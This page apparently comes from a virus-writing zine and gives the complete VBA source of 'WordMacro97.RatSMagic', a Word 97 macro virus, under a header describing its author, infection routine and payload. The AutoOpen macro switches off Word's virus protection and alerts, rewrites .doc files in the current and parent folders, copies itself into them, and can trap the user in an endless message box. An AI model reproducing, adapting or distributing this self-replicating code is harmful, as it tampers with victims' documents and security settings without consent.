Copy Link
Add to Bookmark
Report
SLAM3.029: WordMacro97.RatSMagic virus by Reptile
‹fl€fl‹
fi fi
fifl›˙a˙t˙S˙M˙a˙g˙i˙c
fi fi
› ›
fi ‹
fl‹‹fl- Name: WordMacro97.RatSMagic
- Version: 1.0
- Author: Reptile <reptile_bwaha@hotmail.com>
- Type: Direct action
- Macros: 1 (AutoOpen)
- Anti-heuristic: Doesn't use FileFormat:= wdFormatTemplate
- Payload: If Rnd() <= 0.666 and Rnd() >= 0.666 then it shows a message box. If you push the ok button the msgbox comes again and again...
- Infection: This virus takes a doc file from the current dir and then it changes this file, by using the filesystem commands, to a template. After that it copies the AutoOpen macro to the victim. The virus will also infect subdirectorys.
-[RSM.BAS]--------------------------------------------------------------------
Attribute VB_Name = "RatSMagic"
Sub AutoOpen()
Application.ScreenUpdating = False
WordBasic.DisableAutoMacros 0
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
rsminf: FileName$ = CurDir$ + "\" + Dir("*.doc")
On Error GoTo payl
Open FileName$ For Input As #1
Seek #1, 521
RSM$ = Input$(3, #1)
Close #1
If RSM$ = Chr$(1) + Chr$(18) + Chr$(191) Then GoTo chgdir
Open FileName$ For Append As #1
Seek #1, 523
Print #1, Chr$(1) + Chr$(18) + Chr$(191) + Chr$(0) + Chr$(0)
Close #1
rsmdoc = ActiveDocument.FullName
Application.Documents.Open FileName
Application.OrganizerCopy Source:=rsmdoc, Destination:=FileName, Name:="RatSMagic", Object:=wdOrganizerObjectProjectItems
Application.Documents.Save
ActiveDocument.Close
chgdir: ChDir ".."
GoTo rsminf
payl: If Rnd() <= 0.666 And Rnd() >= 0.666 Then GoTo JokE Else GoTo ecsit
JokE: MsgBox "RatSMagic by Reptile", , "bwahahahaha!!!"
GoTo JokE
ecsit:
End Sub
------------------------------------------------------------------------------
